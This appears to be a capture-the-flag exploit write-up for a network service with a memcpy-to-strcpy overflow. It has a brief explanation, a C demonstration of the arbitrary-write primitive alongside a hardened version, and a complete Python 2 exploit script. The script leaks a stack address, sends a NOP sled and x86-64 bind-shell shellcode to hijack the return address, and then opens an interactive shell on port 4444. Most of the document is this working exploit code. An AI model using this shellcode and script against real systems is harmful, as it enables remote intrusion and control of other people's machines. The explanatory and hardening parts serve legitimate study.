For some reason there is an occasional problem where the stack does not get leaked, but it works anyway.

The memcpy overflow overwrites the address of the dest that strcpy will later write to, which turns strcpy into a write of a chosen value to a chosen address. That write is used to point RET at the buffer, so the function returns into the NOP sled and slides into the shellcode.
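The write primitive described above, as an added example that is not code from the writeup or from the challenge binary: a constructed struct with a fixed-size buffer immediately followed by the pointer that strcpy() writes through, so an oversized memcpy() clobbers that pointer and the following strcpy() lands wherever the attacker chose. The buffer size (16), the struct layout and the "pwned" string are assumptions for this demo; the hardened form beside it shows the two checks that kill the primitive (a length check on the copy and a bounded write). It does not demonstrate the RET/NOP-sled stage, which needs an executable stack.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/*
 * Constructed layout (assumed for this demo, not the challenge's): a
 * fixed-size buffer directly followed by the pointer strcpy() writes to.
 */
struct frame {
    char  buf[16];
    char *dest;          /* target of the later strcpy() */
};

/* Vulnerable pattern: unchecked memcpy() into buf, then strcpy() through dest.
 * noinline keeps the compiler from reasoning about the overflow away. */
__attribute__((noinline))
static void vuln_copy(struct frame *f, const unsigned char *in, size_t len, const char *val)
{
    memcpy(f->buf, in, len);   /* len > sizeof f->buf overwrites f->dest */
    strcpy(f->dest, val);      /* val now lands wherever dest points */
}

/* Hardened form: reject oversized input and bound the second write. */
static int safe_copy(struct frame *f, const unsigned char *in, size_t len,
                     const char *val, size_t dest_len)
{
    if (len > sizeof f->buf)
        return -1;                           /* overflow rejected outright */
    memcpy(f->buf, in, len);
    snprintf(f->dest, dest_len, "%s", val);  /* bounded, NUL-terminated */
    return 0;
}

/* Attacker input: filler up to the pointer field, then the raw address of target. */
static size_t build_input(unsigned char *out, char *target)
{
    size_t off = offsetof(struct frame, dest);
    memset(out, 'A', off);
    memcpy(out + off, &target, sizeof target);
    return off + sizeof target;
}

/* Returns 1 if the overflow redirected strcpy() into target and legit stayed untouched. */
int demo_arbitrary_write(void)
{
    char legit[32] = {0};      /* where the program meant to write */
    char target[32] = {0};     /* where the attacker wants the write */
    struct frame f = { {0}, legit };
    unsigned char in[sizeof(struct frame)];
    size_t len = build_input(in, target);

    vuln_copy(&f, in, len, "pwned");
    return strcmp(target, "pwned") == 0 && legit[0] == '\0';
}

/* Same input against the hardened copy: returns 1 if it is rejected and nothing is written. */
int demo_hardened(void)
{
    char legit[32] = {0};
    char target[32] = {0};
    struct frame f = { {0}, legit };
    unsigned char in[sizeof(struct frame)];
    size_t len = build_input(in, target);

    int rc = safe_copy(&f, in, len, "pwned", sizeof legit);
    return rc == -1 && target[0] == '\0' && legit[0] == '\0';
}

int main(void)
{
    printf("vulnerable: write redirected = %d\n", demo_arbitrary_write());
    printf("hardened:   attack rejected  = %d\n", demo_hardened());
    return 0;
}
```

The offset of the pointer field is what the real exploit has to recover by reversing the binary; here it is taken from the constructed struct with offsetof(), and the 8 pointer bytes are appended raw, exactly as p64() does in the script below.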


# Exploit script (Python 2). banner(), p64() and up64() come from the
# author's own hackutil helper module; up64() returns a struct.unpack tuple.
import time
from hackutil import *
from socket import *
from telnetlib import *
 
HOST = "192.168.136.152"
PORT = 6666
 
#================================================================
# x86-64 bind shell: socket/bind/listen/accept on TCP 4444, dup2 the
# client fd onto stdin/stdout/stderr, then execve("/bin/sh").
shellcode = ("\x31\xc0\x31\xdb\x31\xd2\xb0\x01\x89\xc6\xfe\xc0\x89\xc7\xb2"
        "\x06\xb0\x29\x0f\x05\x93\x48\x31\xc0\x50\x68\x02\x01\x11\x5c"
        "\x88\x44\x24\x01\x48\x89\xe6\xb2\x10\x89\xdf\xb0\x31\x0f\x05"
        "\xb0\x05\x89\xc6\x89\xdf\xb0\x32\x0f\x05\x31\xd2\x31\xf6\x89"
        "\xdf\xb0\x2b\x0f\x05\x89\xc7\x48\x31\xc0\x89\xc6\xb0\x21\x0f"
        "\x05\xfe\xc0\x89\xc6\xb0\x21\x0f\x05\xfe\xc0\x89\xc6\xb0\x21"
        "\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68"
        "\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89"
        "\xe6\xb0\x3b\x0f\x05\x50\x5f\xb0\x3c\x0f\x05")
#================================================================
 
banner()
 
print "==================[ Phase 1 : Stack leak ]=================="
sock = socket(AF_INET, SOCK_STREAM)
sock.connect((HOST, PORT))
 
# Fill the 0x108-byte buffer with NULs; the 8 bytes the service echoes
# back right after it (offsets 0x108..0x110) are the leaked stack address.
payload = "\x00"*0x108
time.sleep(0.1)
sock.send('arsenal\n')           # answers to the service's three prompts
time.sleep(0.1)
sock.recv(1024)
sock.send('gyeongbokgung\n')
time.sleep(0.1)
sock.recv(1024)
sock.send('psy\n')
time.sleep(0.1)
sock.recv(1024)
sock.send(payload)
time.sleep(0.1)
 
data = up64(sock.recv(2048)[0x108:0x110])[0]
print "[*] Find Stack : "+hex(data)
 
sock.close()
print "=============[ Phase 2 : Attack with Shellcode ]============"
 
sock2 = socket(AF_INET, SOCK_STREAM)
sock2.connect((HOST, PORT))
# NOP sled + shellcode, NOP-padded up to the return address at offset
# 0x108, which is replaced with leaked address + 16, aimed into the sled.
payload = "\x90"*20 + shellcode + "\x90"*(0x108-20-len(shellcode)) + p64(data+16)
print "Payload Length : "+hex(len(payload))
time.sleep(0.1)
sock2.send('arsenal\n')
time.sleep(0.1)
sock2.recv(1024)
sock2.send('gyeongbokgung\n')
time.sleep(0.1)
sock2.recv(1024)
sock2.send('psy\n')
time.sleep(0.1)
sock2.recv(1024)
sock2.send(payload)
time.sleep(2)                    # give the bind shell time to start listening
 
print "=================[ Phase 3 : Got the Shell ]================"
 
# Connect to the bind shell on 4444 and hand the socket to telnetlib
# for an interactive session.
sock3 = socket(AF_INET, SOCK_STREAM)
sock3.connect((HOST, 4444))
t = Telnet()
t.sock = sock3
t.interact()

